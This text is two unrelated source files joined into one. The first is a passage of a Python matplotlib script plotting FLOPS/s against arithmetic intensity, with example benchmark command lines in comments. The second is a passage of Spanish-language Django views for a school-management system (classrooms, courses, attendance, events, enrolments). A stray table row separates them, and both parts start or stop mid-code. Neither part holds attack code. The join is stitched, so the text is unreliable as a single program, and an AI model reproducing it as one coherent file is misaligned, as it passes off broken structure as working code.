    # Reference lines at 1/10, 1/5, 1/2 and 1x of the next power of ten above
    # the best observed FLOPS/s rate.
    max_fps = max( ept.flops/ept.rts for ept in inc_comp(self.epts) )
    log10_max_fps = int(math.ceil(math.log(max_fps,10)))
    if 1:
        fps_bnd = 10**log10_max_fps
        self.add_fps_line( ax, fps_bnd / 10.0 )
        self.add_fps_line( ax, fps_bnd / 5.0 )
        self.add_fps_line( ax, fps_bnd / 2.0 )
        self.add_fps_line( ax, fps_bnd )
    self.adj_ticks(ax,fig)
    fig.savefig( self.args.out_fn + "." + self.args.out_fmt, dpi=600, bbox_inches='tight')
    # Second figure: FLOPS/s vs arithmetic intensity (linear axes).
    fig = plt.figure()
    ax = fig.add_subplot(111)
    #formatting:
    ax.set_title("F/s vs Arithmetic Intensity",fontsize=12,fontweight='bold')
    ax.set_xlabel("Arithmetic Intensity", fontsize=12) # ,fontproperties = font)
    ax.set_ylabel("F/s", fontsize=12) # ,fontproperties = font)
    x = [ ept.ai for ept in inc_comp(self.epts) ]
    y = [ ept.flops/ept.rts for ept in inc_comp(self.epts) ]
    self.set_bnds( ax, x, y )
    # print matplotlib.lines.Line2D.filled_markers
    # --> (u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd')
    for ept in self.epts:
        x,y = self.plot_fps_vs_ai_pt( ax, ept, 0 )
        if ept.comp:
            xc,yc = self.plot_fps_vs_ai_pt( ax, ept.comp, 1 )
            ax.plot( [x,xc], [y,yc], linewidth=0.5, color='black' )
    leg_art = []; leg_lab = []
    for vi in vis: vi.get_leg( leg_art, leg_lab )
    # Extra legend entries: marker size encodes log10(FLOPS) in this plot.
    max_flops = max( ept.flops for ept in inc_comp(self.epts) )
    mfl = int(math.ceil(math.log(max_flops,10)))
    for ls in range(max(mfl-5,1),mfl):
        ms=2*max(1,ls-6)
        leg_art += [plt.Line2D((0,0),(0,0), color="black", marker='o', linestyle='', markersize=ms)]
        leg_lab += ["$10^{"+str(ls)+"}$ Flops"]
    legend = ax.legend(leg_art,leg_lab,loc='upper right', shadow=True, fontsize='small',numpoints=1,ncol=1)
    legend.get_frame().set_facecolor('#eeddcc')
    fig.canvas.draw()
    fig.savefig( self.args.out_fn + "-ai" + "." + self.args.out_fmt, dpi=600, bbox_inches='tight')
    # ai vs GF/s plot
def set_bnds( self, ax, x, y ):
    """Set axis limits from the data (5% headroom above the max) and remember
    the bounds and aspect factors on self for later annotation placement."""
    self.x_min, self.x_max = min(x), max(x) * 1.05
    self.y_min, self.y_max = min(y), max(y) * 1.05
    ax.axis([self.x_min, self.x_max, self.y_min, self.y_max])
    # data_aspect converts data-space slopes into screen-space slopes.
    self.data_aspect = float(self.x_max - self.x_min) / (self.y_max - self.y_min)
    #self.axis_aspect_rat = .618
    self.axis_aspect_rat = 1
    self.axis_aspect = self.axis_aspect_rat * self.data_aspect
    ax.set_aspect(self.axis_aspect)
def adj_ticks( self, ax, fig ):
    """Pass every tick label through adj_tick_lab (draw first so labels exist)."""
    fig.canvas.draw()
    for get_labels, set_labels in ((ax.get_xticklabels, ax.set_xticklabels),
                                   (ax.get_yticklabels, ax.set_yticklabels)):
        set_labels([adj_tick_lab(lab) for lab in get_labels()])
def add_fps_line( self, ax, fps ):
    """Draw a constant-F/s guide line; the log-scale variant is the default."""
    self.add_fps_line_log( ax, fps )
def add_fps_line_lin( self, ax, fps ):
    """Draw a constant-F/s guide line on linear axes, labeled with its rate."""
    xs = [self.x_min, (self.x_min + self.x_max) * 0.5, self.x_max]
    ys = [v / fps for v in xs]
    mid_y = (self.y_min + self.y_max) / 2
    if ys[1] > mid_y:
        # Steep line: anchor the label at mid-height instead of mid-width.
        ys[1] = mid_y
        xs[1] = ys[1] * fps
    ax.plot(xs, ys, linewidth=1.0, color='black', linestyle=':')
    label_string = "%.1fGF/s" % (fps/1e9)
    angle = np.arctan(ys[1] / xs[1] * self.axis_aspect) * 180 / np.pi
    ax.text(xs[1], ys[1], label_string, fontsize=8, rotation=angle, ha="left", va="bottom")
def add_fps_line_log( self, ax, fps ):
    """Draw a constant-F/s guide line on log10/log10 axes, labeled with its rate."""
    xs = [self.x_min, self.x_min * 0.2 + self.x_max * 0.8, self.x_max]
    ys = [v - math.log(fps, 10) for v in xs]
    mid_y = self.y_min * 0.2 + self.y_max * 0.8
    if ys[1] > mid_y:
        # Steep line: clamp the label anchor back onto the line at mid height.
        ys[1] = mid_y
        xs[1] = ys[1] + math.log(fps, 10)
    ax.plot(xs, ys, linewidth=1.0, color='black', linestyle=':')
    label_string = "%.1fGF/s" % (fps/1e9)
    # On log/log axes every constant-F/s line has slope 1, so only the
    # data-to-screen aspect determines the label rotation.
    angle = np.arctan(self.data_aspect) * 180 / np.pi
    ax.text(xs[1], ys[1], label_string, fontsize=12, rotation=angle, ha="left", va="bottom")
import argparse
parser = argparse.ArgumentParser(description='Create eff plots.')
parser.add_argument('--eff-fn', metavar="FN", type=str, default="eff-tab.raw", help="filename of eff values in latex table format" )
parser.add_argument('--eff-comp-fn', metavar="FN", type=str, default="", help="filename of eff values in latex table format for comparison to those from the file specified by --eff-fn" )
parser.add_argument('--out-fn', metavar="FN", type=str, default="eff", help="base filename of output plot image" )
parser.add_argument('--out-fmt', metavar="EXT", type=str, default="png", help="extension/format for output plot image" )
# type=int, not type=bool: argparse applies bool() to the raw string, so
# '--do-zooms 0' (or even '--do-zooms False') used to evaluate truthy.
# 0/1 on the command line now behave as documented; default stays 0.
parser.add_argument('--do-zooms', metavar="BOOL", type=int, default=0, help="if true, output zoomed and 2X zoomed graphs" )
parser.add_argument('--min-rel-delta-to-show', metavar="FLOAT", type=float, default=0.05, help="if true, skip showing points where delta/avg is < this value in comparison mode" )
args = parser.parse_args()
ep = EffPlot(args)
# example command lines for generating inputs to this script:
# boda on titan-X, optimized variants enabled
# boda cnn_op_info --cnn-func-sigs-fn='%(boda_test_dir)'/conv-ops-1-5-20-nin-alex-gn.txt --op-eff-tab-fn=conv-1-5-20-nin-alex-gn-titanX-boda.raw --rtc='(be=nvrtc)' --gen-data='(type=foo,str_vals=(vi=0.0f,mode=5))' --op-tune='(tconv=1,k1conv=1)' --rtc-comp='(be=nvrtc)' --max-err=10 --show-rtc-calls=1 --mad-toler=3e-3 --print-format=1 --inc-op-info-in-eff=1
# run on SD820, optimizations enabled, no comparison:
# export SD820_RTC="rtc=(be=ipc,remote_rtc=(be=ocl,gen_src=1,gen_src_output_dir=/data/local/rtc-gen-src),spawn_str=adb shell LD_LIBRARY_PATH=/data/local/lib /data/local/bin/boda,spawn_shell_escape_args=1,boda_parent_addr=tcp:10.0.0.100:12791)"
# export OP_TUNE="op_tune=(use_culibs=0,MNt=8:8,MNb=16:16,k1conv=1,tconv=0,Kb=1,vw=8,use_local_mem=2)"
# boda cnn_op_info --cnn-func-sigs-fn='%(boda_test_dir)'/conv-ops-1-5-20-nin-alex-gn.txt --op-eff-tab-fn=conv-1-5-20-nin-alex-gn-SD820-boda.raw --"${SD820_RTC}" --"${OP_TUNE}" --show-rtc-calls=1 --peak-flops=320e9 --print-format=1 --inc-op-info-in-eff=1
| 13,953 | 5,575 |
import datetime
import json
import calendar
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.urls import reverse_lazy, reverse
from django.views.generic import FormView
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from django.views.generic import TemplateView
from AE_academico.forms import AulaForm, MarcarAsistenciaForm, SubirNotasForm, CursoForm, EventoForm, PeriodoAcademicoForm, \
HorarioAulaForm, RegistrarNotas2Form, RecordatorioAulaForm, AulaCursoForm
from AE_academico.forms import CursoDocenteForm
from AE_academico.models import Aula, Asistencia, Notas, AulaCurso, Evento, HorarioAula, AulaMatricula, PeriodoAcademico, \
RecordatorioAula
from AE_academico.models import CursoDocente
from AE_academico.models import Curso
from enrollment.models import Matricula
from income.models import obtener_mes
from register.models import Docente, Personal, PersonalColegio, Alumno, Colegio
from django.conf import settings
from utils.middleware import validar_roles, get_current_request, get_current_colegio, get_current_user
from django.http import HttpResponseRedirect
from utils.views import MyLoginRequiredMixin
import logging
logger = logging.getLogger("project")
#####################################################
##### CRUD DE AULA #####
#####################################################
class AulaListView(MyLoginRequiredMixin, ListView):
    """List the aulas; restricted to administrative roles."""
    model = Aula
    template_name = 'aula_list.html'

    def get(self, request, *args, **kwargs):
        # Only these roles may see the aula list.
        allowed = ['promotor', 'director', 'administrativo', 'tesorero', 'cajero']
        if not validar_roles(roles=allowed):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(AulaListView, self).get(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(AulaListView, self).get_context_data(**kwargs)
        # Expose the colegio id kept in the session, when present.
        colegio_id = get_current_request().session.get('colegio')
        if colegio_id:
            context['idcolegio'] = colegio_id
        return context
class AulaDetailView(UpdateView):
    """Detail page for an Aula: its enrolled students, courses and teachers.

    The aula is selected via the 'aula' query parameter; access is restricted
    to administrative roles.
    """
    model = Aula
    form_class = AulaForm
    template_name = 'aula_detail.html'

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo', 'tesorero', 'cajero']
        if not validar_roles(roles=roles):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        aula = Aula.objects.get(id_aula=request.GET["aula"])
        # Active enrolments of this aula, ordered by paternal surname.
        # (A previous colegio-wide Matricula query here was dead code: its
        # result was immediately overwritten by this queryset.)
        matriculadosaula = AulaMatricula.objects.filter(
            aula=aula, activo=True).order_by('matricula__alumno__apellido_pa')
        lista_matriculados = [m.matricula for m in matriculadosaula]
        cursos = AulaCurso.objects.filter(aula=aula, activo=True)
        cursos_docentes = []
        for curso in cursos:
            try:
                cursos_docentes.append(CursoDocente.objects.get(curso=curso, activo=True))
            except CursoDocente.DoesNotExist:  # was a bare except that hid real errors
                logger.info("No hay docente aun en el curso {0}".format(curso.curso))
        return render(request, template_name=self.template_name, context={
            'matriculados_aula': lista_matriculados,
            'aula': aula,
            'cursos': cursos,
            'cursos_docentes': cursos_docentes,
        })
class AulaCreationView(CreateView):
    """Create an Aula bound to the current colegio (tipo is fixed to 1)."""
    model = Aula
    form_class = AulaForm
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'aula_form.html'

    def form_valid(self, form):
        # Attach the session's colegio and force tipo=1 before saving.
        form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
        form.instance.tipo = 1
        return super(AulaCreationView, self).form_valid(form)

    def get(self, request, *args, **kwargs):
        permitted = ['promotor', 'director', 'administrativo', 'tesorero']
        if not validar_roles(roles=permitted):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(AulaCreationView, self).get(request, *args, **kwargs)
class AulaUpdateView(UpdateView):
    """Edit an existing Aula and return to the aula list on success."""
    model = Aula
    template_name = 'aula_form.html'
    form_class = AulaForm
    success_url = reverse_lazy('academic:aula_list')
class AulaDeleteView(DeleteView):
    """Confirm and delete an Aula; restricted to administrative roles."""
    model = Aula
    form_class = AulaForm
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'aula_confirm_delete.html'

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(AulaDeleteView, self).get(request, *args, **kwargs)
#####################################################
##### CRUD DE CURSO #####
#####################################################
class CursoListView(MyLoginRequiredMixin, ListView):
    """List the cursos; restricted to administrative roles."""
    model = Curso
    template_name = 'curso_list.html'

    def get(self, request, *args, **kwargs):
        allowed = ['promotor', 'director', 'administrativo']
        if not validar_roles(roles=allowed):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(CursoListView, self).get(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(CursoListView, self).get_context_data(**kwargs)
        # Expose the colegio id kept in the session, when present.
        colegio_id = get_current_request().session.get('colegio')
        if colegio_id:
            context['idcolegio'] = colegio_id
        return context
class CursoDetailView(UpdateView):
    """Show/edit a single Curso; restricted to administrative roles."""
    model = Curso
    form_class = CursoForm
    template_name = 'curso_detail.html'

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(CursoDetailView, self).get(request, *args, **kwargs)
class CursoCreationView(CreateView):
    """Create a Curso bound to the current colegio."""
    model = Curso
    form_class = CursoForm
    success_url = reverse_lazy('academic:curso_list')
    template_name = 'curso_form.html'

    def form_valid(self, form):
        # Attach the session's colegio before saving.
        form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
        return super(CursoCreationView, self).form_valid(form)

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(CursoCreationView, self).get(request, *args, **kwargs)
class CursoUpdateView(UpdateView):
    """Edit an existing Curso and return to the curso list on success."""
    model = Curso
    template_name = 'curso_form.html'
    form_class = CursoForm
    success_url = reverse_lazy('academic:curso_list')
class CursoDeleteView(DeleteView):
    """Confirm and delete a Curso; restricted to administrative roles."""
    model = Curso
    form_class = CursoForm
    # Was 'academic:aula_list' — an apparent copy/paste slip: every other
    # Curso view redirects to the curso list, so deletion now does too.
    success_url = reverse_lazy('academic:curso_list')
    template_name = 'curso_confirm_delete.html'

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo']
        if validar_roles(roles=roles):
            return super(CursoDeleteView, self).get(request, *args, **kwargs)
        else:
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
#####################################################
##### CRUD DE CURSO DOCENTE #####
#####################################################
class CursoDocenteCreateView(CreateView):
    """Assign a docente to an aula's course.

    GET renders the form with the colegio's docentes and the AulaCurso
    selected via the 'curso' query parameter.
    """
    model = CursoDocente
    form_class = CursoDocenteForm
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'cursodocente_form.html'

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo', 'tesorero']
        if not validar_roles(roles=roles):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        personalcolegio = PersonalColegio.objects.filter(colegio_id=get_current_colegio(), activo=True)
        cursos = AulaCurso.objects.filter(id_aula_curso=request.GET['curso'],
                                          activo=True)
        docentes = []
        # Keep only the personal that actually have a Docente profile.
        for vinculo in personalcolegio:
            try:
                docentes.append(Docente.objects.get(empleado=vinculo.personal))
            except Docente.DoesNotExist:  # was a bare except, which hid real errors
                logger.info("Persona no es un docente ---- AE_academico")
        return render(request, template_name=self.template_name, context={
            'form': self.form_class,
            'docentes': docentes,
            'cursos': cursos,
        })
#####################################################
##### CRUD DE AULA CURSO #####
#####################################################
class AulaCursoCreateView(TemplateView):
    """Attach cursos to an aula via a checkbox form.

    GET renders the colegio's cursos for the aula given in the 'aula' query
    parameter; POST creates one AulaCurso per checked course.
    """
    model = AulaCurso
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'aulacurso_form.html'

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo', 'tesorero']
        if not validar_roles(roles=roles):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        aula_actual = Aula.objects.get(id_aula=request.GET['aula'])
        cursos = Curso.objects.filter(colegio_id=get_current_colegio(), activo=True)
        return render(request, template_name=self.template_name, context={
            'aula': aula_actual,
            'cursos': cursos,
        })

    def post(self, request, *args, **kwargs):
        logger.info(request.POST)  # was print(); use the module logger like the rest of the file
        cursos = Curso.objects.filter(colegio_id=get_current_colegio(), activo=True)
        aula = Aula.objects.get(id_aula=request.POST['aula'])
        for curso in cursos:
            # Checkbox "item<id>" is only present when that course was selected.
            # .get() replaces the old bare try/except, which swallowed not just
            # the KeyError of unchecked rows but any error during save().
            if request.POST.get("item{0}".format(curso.id_curso)):
                self.model(aula=aula, curso=curso).save()
                logger.info("se creo un registro")
        return HttpResponseRedirect(reverse('academic:aula_list'))
class AulaCursoDeleteView(TemplateView):
    """Soft-delete an AulaCurso together with its docente assignments."""
    model = AulaCurso
    form_class = AulaCursoForm
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'aulacurso_confirm_delete.html'

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        vinculo = self.model.objects.get(pk=int(request.GET['curso']))
        # Deactivate the teachers tied to this aula-curso before the link itself.
        for asignado in vinculo.getDocentesAsociados():
            asignado.activo = False
            asignado.save()
        vinculo.activo = False
        vinculo.save()
        return HttpResponseRedirect(reverse('academic:aula_list'))
#####################################################
##### ASISTENCIA ALUMNOS #####
#####################################################
class MarcarAsistenciaView(CreateView):
    """Register today's attendance for every alumno of the colegio.

    GET renders the roster; POST stores one Asistencia row per submitted
    (id, estado_asistencia) pair, dated today.
    """
    model = Asistencia
    template_name = 'marcar_asistencia.html'
    form_class = MarcarAsistenciaForm
    success_url = reverse_lazy('academic:asistencia_ver')

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo']
        if not validar_roles(roles=roles):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        # NOTE(review): tipo de servicio is hard-coded to 1 here — confirm it
        # should not come from the request/session.
        id_tipo_servicio = 1
        docente = True
        id_colegio = get_current_colegio()
        matriculados = Matricula.objects.filter(
            colegio_id=id_colegio, activo=True,
            tipo_servicio=id_tipo_servicio).order_by('alumno__apellido_pa')
        logger.info("Datos son {0}".format(matriculados))
        alumnos = [matricula.alumno for matricula in matriculados]
        return render(request, template_name=self.template_name, context={
            'form': self.form_class,
            'alumnos': alumnos,
            'docente': docente,
        })

    def post(self, request, *args, **kwargs):
        logger.info("Estoy en el POST")
        logger.info("Los datos de llegada son {0}".format(request.POST))
        alumnos_id = request.POST.getlist('id')
        estado_asistencias = request.POST.getlist('estado_asistencia')
        logger.info("Los estados son {0}".format(estado_asistencias))
        hoy = datetime.date.today()
        # zip keeps ids and estados aligned; the old index loop plus an unused
        # 'contexto = {}' local are gone.
        for alumno_id, estado in zip(alumnos_id, estado_asistencias):
            alumno = Alumno.objects.get(id_alumno=alumno_id)
            Asistencia(alumno=alumno, fecha=hoy, estado_asistencia=estado).save()
        return redirect('academic:asistencia_ver')
class MarcarAsistenciaDiaView(TemplateView):
    """Two-step daily attendance form.

    POST with an 'aula' key renders that aula's roster plus any attendance
    already recorded today; POST without 'aula' saves (or updates) today's
    attendance states for the submitted alumnos.
    """
    model = Asistencia
    template_name = 'asistencia_marcar.html'
    success_url = reverse_lazy('academic:asistencia_registrar_dia')

    def MarcarAsistencia1Form(self, request):
        # Context helper: the aulas of the current colegio (promotor/director only).
        roles = ['promotor', 'director']
        if validar_roles(roles=roles):
            # Load the aulas tied to the current colegio
            id_colegio = get_current_colegio()
            aulas_colegio = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
            return {'aulas_colegio': aulas_colegio}
        else:
            mensaje_error = "No tienes acceso a esta vista"
            return {'mensaje_error': mensaje_error} # return context

    def MarcarAsistencia2Form(self, request):
        # Context helper: the selectable attendance states.
        roles = ['promotor', 'director']
        if validar_roles(roles=roles):
            # Load the attendance states offered by the form
            estado_asistencia = ["Sin registro", "Presente", "Tardanza", "Ausente"]
            return {'estado_asistencia': estado_asistencia}
        else:
            mensaje_error = "No tienes acceso a esta vista"
            return {'mensaje_error': mensaje_error} # return context

    def get(self, request, *args, **kwargs):
        super(MarcarAsistenciaDiaView, self).get(request, *args, **kwargs)
        # Merge both helper contexts; either may carry the access-denied marker.
        contexto = self.MarcarAsistencia1Form(request)
        contexto.update(self.MarcarAsistencia2Form(request))
        if 'mensaje_error' in contexto.keys():
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        else:
            return render(request, self.template_name, contexto) # return context

    def post(self, request, *args, **kwargs):
        logger.info("Estoy en el POST")
        logger.info("Los datos de llegada son {0}".format(request.POST))
        if 'aula' in request.POST.keys():
            # Step 1: an aula was chosen — show its roster and today's records.
            aula = request.POST["aula"]
            matriculadosaula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
            logger.info("Datos son {0}".format(matriculadosaula))
            alumnos = []
            for matriculado in matriculadosaula:
                alumnos.append(matriculado.matricula.alumno)
            # One queryset per alumno with whatever was already marked today.
            asistencia_hoy = []
            num = len(alumnos)
            for n in range (0, num):
                asistencia_hoy.append(Asistencia.objects.filter(alumno=alumnos[n], fecha=datetime.date.today()))
            logger.info("Las asistencias de hoy son {0}".format(asistencia_hoy))
            contexto = self.MarcarAsistencia1Form(request)
            contexto.update(self.MarcarAsistencia2Form(request))
            contexto['alumnos'] = alumnos
            contexto['asistencias'] = asistencia_hoy
            return render(request, template_name=self.template_name, context=contexto)
        else:
            # Step 2: the filled form was submitted — persist today's states.
            logger.info("Estoy en el POST")
            logger.info("Los datos de llegada son {0}".format(request.POST))
            data_post = request.POST
            alumnos_id = data_post.getlist('id')
            estado_asistencias = data_post.getlist('estado_asistencia')
            # Map labels to stored codes: Presente=1, Tardanza=2, Ausente=3,
            # anything else (e.g. "Sin registro")=4.
            estados = []
            for estado in estado_asistencias:
                if estado == 'Presente':
                    estados.append(1)
                elif estado == 'Tardanza':
                    estados.append(2)
                elif estado == 'Ausente':
                    estados.append(3)
                else:
                    estados.append(4)
            logger.info("Los estados son {0}".format(estado_asistencias))
            num = len(alumnos_id)
            for n in range(0, num):
                alumno = Alumno.objects.get(id_alumno=alumnos_id[n])
                # Create today's record on first submission, update it otherwise.
                asistencia_primera = Asistencia.objects.filter(alumno=alumno, fecha=datetime.date.today())
                logger.info("{0}".format(asistencia_primera.count()))
                if asistencia_primera.count() == 0:
                    asistencia = Asistencia(alumno=alumno, fecha=datetime.date.today(),
                                            estado_asistencia=estados[n])
                    asistencia.save()
                else:
                    for asistencia in asistencia_primera:
                        asistencia.estado_asistencia = estados[n]
                        asistencia.save()
            return redirect('academic:asistencia_ver')
class VisualizarAsistenciaView(TemplateView):
    """Monthly attendance report for one aula.

    GET renders the month/aula selectors; POST builds the per-day attendance
    grid for the chosen aula and month of the current year.
    """
    model = Asistencia
    template_name = "asistencia_ver.html"
    #form_class = CuentasCobrarPromotorDetalleForm

    def VisualizarAsistenciaform(self, request):
        # Context helper: month names and the colegio's aulas (promotor/director only).
        roles = ['promotor', 'director']
        if validar_roles(roles=roles):
            # All twelve month names are offered; the old loop that sliced them
            # by the current month was dead code and raised IndexError in
            # December (it indexed meses_todos[12]).
            meses_todos = ["Enero", "Febrero", "Marzo", "Abril", "Mayo", "Junio", "Julio", "Agosto",
                           "Setiembre", "Octubre", "Noviembre", "Diciembre"]
            id_colegio = get_current_colegio()
            aulas = Aula.objects.filter(tipo_servicio__colegio=id_colegio).order_by('nombre')
            return {'meses': meses_todos, 'aulas': aulas}
        else:
            mensaje_error = "No tienes acceso a esta vista"
            return {'mensaje_error': mensaje_error} # return context

    def get(self, request, *args, **kwargs):
        super(VisualizarAsistenciaView, self).get(request, *args, **kwargs)
        contexto = self.VisualizarAsistenciaform(request)
        if 'mensaje_error' in contexto.keys():
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        else:
            return render(request, self.template_name, contexto) # return context

    def post(self, request, *args, **kwargs):
        mes = request.POST["mes"]
        aula = request.POST["aula"]
        num_mes = obtener_mes(mes)
        logger.info("Estoy en el Post, datos de llegada son {0}".format(request.POST))
        anio = datetime.date.today().year
        # calendar.monthrange accounts for leap years; the previous hard-coded
        # day table always used 28 for February.
        num_dias = calendar.monthrange(anio, num_mes)[1]
        # Attendance rows narrowed to the selected year and month.
        asistencias_curso_mes = self.model.objects.filter(fecha__year=anio, fecha__month=num_mes)
        logger.info("La lista de asistencias de mes son {0}".format(asistencias_curso_mes))
        matriculados_aula = AulaMatricula.objects.filter(aula=aula).order_by('matricula__alumno__apellido_pa')
        alumnos = [matriculado.matricula.alumno for matriculado in matriculados_aula]
        logger.info("El número de alumnos matriculados en esta aula es {0}".format(len(alumnos)))
        # Flatten the month into one state list plus the dates that have data.
        fechas = []
        lista_asistencias_dia = []
        for dia in range(1, num_dias + 1):
            asistencias_curso_dia = asistencias_curso_mes.filter(fecha__day=dia)
            logger.info("La lista de asistencias del día {0} mes son {1}".format(dia, asistencias_curso_dia))
            for n, registro in enumerate(asistencias_curso_dia):
                lista_asistencias_dia.append(registro.estado_asistencia)
                if n == 0:
                    # Remember each day that has at least one record.
                    fechas.append(registro.fecha)
        aula_selected = Aula.objects.get(id_aula=aula)
        logger.info("La lista de asistencias de mes son {0}".format(lista_asistencias_dia))
        logger.info("La lista de fechas de mes son {0}".format(fechas))
        contexto = self.VisualizarAsistenciaform(request)
        contexto['asistencias'] = asistencias_curso_mes
        contexto['num_hor'] = len(fechas)
        contexto['num_ver'] = len(alumnos)
        contexto['fechas'] = fechas
        contexto['alumnos'] = alumnos
        contexto['mes_selected'] = mes
        contexto['aula_selected'] = aula_selected
        return render(request, template_name=self.template_name, context=contexto)
#################################################
##### NOTAS ALUMNOS #####
#################################################
#################################################
##### EVENTOS #####
#################################################
class EventoCreateView(CreateView):
    """Create an Evento for the current colegio; the form lists its personnel."""
    model = Evento
    form_class = EventoForm
    template_name = "evento_form.html"
    success_url = reverse_lazy("academic:evento_list")

    def form_valid(self, form):
        # Attach the session's colegio before saving.
        form.instance.colegio = Colegio.objects.get(pk=get_current_colegio())
        return super(EventoCreateView, self).form_valid(form)

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        vinculos = PersonalColegio.objects.filter(colegio_id=get_current_colegio(), activo=True)
        empleados = [vinculo.personal for vinculo in vinculos]
        return render(request, template_name=self.template_name, context={
            'form': self.form_class,
            'empleados': empleados,
        })
class EventoListView(ListView):
    """List every Evento registered for the current colegio."""
    model = Evento
    form_class = EventoForm
    template_name = "evento_list.html"

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        eventos = Evento.objects.filter(colegio_id=get_current_colegio())
        return render(request, template_name=self.template_name, context={
            'eventos': eventos,
        })
class EventoDetailView(DetailView):
    """Show one Evento, selected by the 'evento' query parameter."""
    model = Evento
    form_class = EventoForm
    template_name = "evento_detail.html"

    def get(self, request, *args, **kwargs):
        if not validar_roles(roles=['promotor', 'director', 'administrativo']):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        seleccionado = Evento.objects.get(id_evento=request.GET['evento'])
        return render(request, template_name=self.template_name, context={
            'evento': seleccionado,
        })
#################################################
##### CRUD DE MATRICULA AULA #####
#################################################
class AulaMatriculaCreateView(TemplateView):
    """Assign matriculas (enrolments) to an aula via a checkbox form.

    GET lists the matriculas of the aula's tipo_servicio that have no active
    aula yet; POST creates one AulaMatricula per checked matricula.
    """
    model = AulaMatricula
    success_url = reverse_lazy('academic:aula_list')
    template_name = 'aulamatricula_form.html'

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo']
        if not validar_roles(roles=roles):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        aula_actual = Aula.objects.get(id_aula=request.GET['aula'])
        matriculas = Matricula.objects.filter(tipo_servicio=aula_actual.tipo_servicio,
                                              colegio_id=get_current_colegio(), activo=True)
        no_matriculados_aulas = []
        for matricula in matriculas:
            # Offer only matriculas without an active aula assignment.
            if AulaMatricula.objects.filter(matricula=matricula, activo=True).exists():
                logger.info("El alumno {0} ya tiene aula".format(matricula.alumno))
            else:
                no_matriculados_aulas.append(matricula)
        return render(request, template_name=self.template_name, context={
            'aula': aula_actual,
            'matriculas': no_matriculados_aulas,
        })

    def post(self, request, *args, **kwargs):
        logger.info(request.POST)
        aula_actual = Aula.objects.get(id_aula=request.POST['aula'])
        matriculas = Matricula.objects.filter(tipo_servicio=aula_actual.tipo_servicio,
                                              colegio_id=get_current_colegio(), activo=True)
        for matricula in matriculas:
            # Checkbox "item<id>" is only present when that row was selected.
            # .get() replaces the old bare try/except, which swallowed not just
            # the KeyError of unchecked rows but any error during save().
            if request.POST.get("item{0}".format(matricula.id_matricula)):
                self.model(aula=aula_actual, matricula=matricula).save()
                logger.info("se creo un registro")
        return HttpResponseRedirect(reverse('academic:aula_list'))
class AulaMatriculaDeleteView(TemplateView):
    """Soft-delete the aula assignment of a matricula ('alumno' query param)."""
    model = AulaMatricula
    template_name = "aulamatricula_form.html"

    def get(self, request, *args, **kwargs):
        roles = ['promotor', 'director', 'administrativo']
        if not validar_roles(roles=roles):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        logger.info(request.GET['alumno'])  # was print()
        matricula = Matricula.objects.get(id_matricula=int(request.GET['alumno']))
        # Deactivate only the active assignment(s). The old .get(matricula=...)
        # raised MultipleObjectsReturned once a matricula had ever been
        # assigned and removed before (inactive rows persist).
        for asignacion in AulaMatricula.objects.filter(matricula=matricula, activo=True):
            asignacion.activo = False
            asignacion.save()
        return HttpResponseRedirect(reverse('academic:aula_list'))
#################################################
##### CRUD DE PERIODO ACADEMICO #####
#################################################
class PeriodoAcademicoListView(MyLoginRequiredMixin, ListView):
    """List the academic periods; restricted to administrative roles."""
    model = PeriodoAcademico
    template_name = 'periodo_list.html'

    def get(self, request, *args, **kwargs):
        allowed = ['promotor', 'director', 'administrativo']
        if not validar_roles(roles=allowed):
            return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
        return super(PeriodoAcademicoListView, self).get(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(PeriodoAcademicoListView, self).get_context_data(**kwargs)
